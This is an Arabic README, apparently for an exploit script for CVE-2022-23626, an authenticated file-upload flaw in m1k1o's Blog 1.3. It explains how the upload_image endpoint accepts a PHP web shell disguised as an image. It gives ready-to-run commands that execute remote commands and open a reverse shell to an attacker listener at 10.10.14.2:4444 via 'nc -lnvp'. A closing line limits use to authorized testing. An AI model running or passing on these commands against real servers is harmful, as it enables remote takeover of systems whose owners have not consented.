
استغلال تنفيذ أوامر عن بعد موثق لـ m1k1o's Blog الإصدار 1.3 عبر رفع ملفات غير مدقق، مع قدرات نشر شيل ويب وشيل عكسي.
تنفيذ الأوامر عن بُعد عبر المصادقة عبر ثغرة رفع الملفات في مدونة m1k1o الإصدار 1.3 والإصدارات الأقل.
نقطة النهاية ajax.php?action=upload_image لا تتحقق بشكل صحيح من أنواع الملفات المرفوعة، مما يسمح لمستخدم موثوق برفع قشرة ويب PHP متنكرة كصورة. يمكن للمهاجم بعد ذلك تشغيل التنفيذ عن طريق طلب الملف المرفوع مباشرة.
requestspip install requests
python3 cve-2022-23626.py --url http://target:8081 -u admin -p admin -c "id"
ابدأ مستمعًا أولاً:
nc -lnvp 4444
ثم شغّل:
python3 cve-2022-23626.py --url http://target:8081 -u admin -p admin -lh 10.10.14.2 -lp 4444
هذه الأداة مخصصة فقط لاختبار الأمان المصرح به ولأغراض تعليمية. استخدمها فقط على الأنظمة التي لديك إذن صريح باختبارها.